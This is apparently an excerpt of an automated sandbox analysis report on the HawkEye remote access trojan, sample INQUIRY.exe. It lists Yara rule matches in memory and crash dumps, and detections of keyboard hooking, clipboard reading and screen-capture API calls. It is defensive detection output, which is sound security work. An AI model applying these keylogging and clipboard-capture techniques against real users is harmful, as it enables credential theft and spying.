                    Source: Yara matchFile source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.863232173.0000000002DE0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: WerFault.exe PID: 6776, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPED
                    Source: Yara matchFile source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2210000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.21e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.2300000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.2380000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.2490000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.INQUIRY.exe.25f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.7a0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 32.2.INQUIRY.exe.2630000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.22e0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 27.2.INQUIRY.exe.25e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 33.2.INQUIRY.exe.22f0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.2240000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 28.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.INQUIRY.exe.2660000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPE
                    Contains functionality to log keystrokes (.Net Source)Show sources
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.2300000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 1.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 13.2.INQUIRY.exe.2660000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.2490000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 16.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 27.2.INQUIRY.exe.2640000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                    Source: 28.2.INQUIRY.exe.2240000.2.unpack, Form1.cs.Net Code: HookKeyboard
                    Installs a global keyboard hookShow sources
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exeJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\INQUIRY.exe
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004070D2 OpenClipboard,0_2_004070D2
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004070D2 OpenClipboard,0_2_004070D2
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004233B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_004233B4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_004233B4 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,0_2_004233B4
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004239F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,2_2_004239F8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 2_2_004239F8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,2_2_004239F8
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00459724 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,0_2_00459724
                    Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 0_2_00459724 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,0_2_00459724
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\Desktop\INQUIRY.exeWindow created: window name: CLIPBRDWNDCLASS
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6808, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 5896, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: INQUIRY.exe PID: 6076, type: MEMORY

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.2270000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0.2.INQUIRY.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 32.2.INQUIRY.exe.2680000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.2370000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.2.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
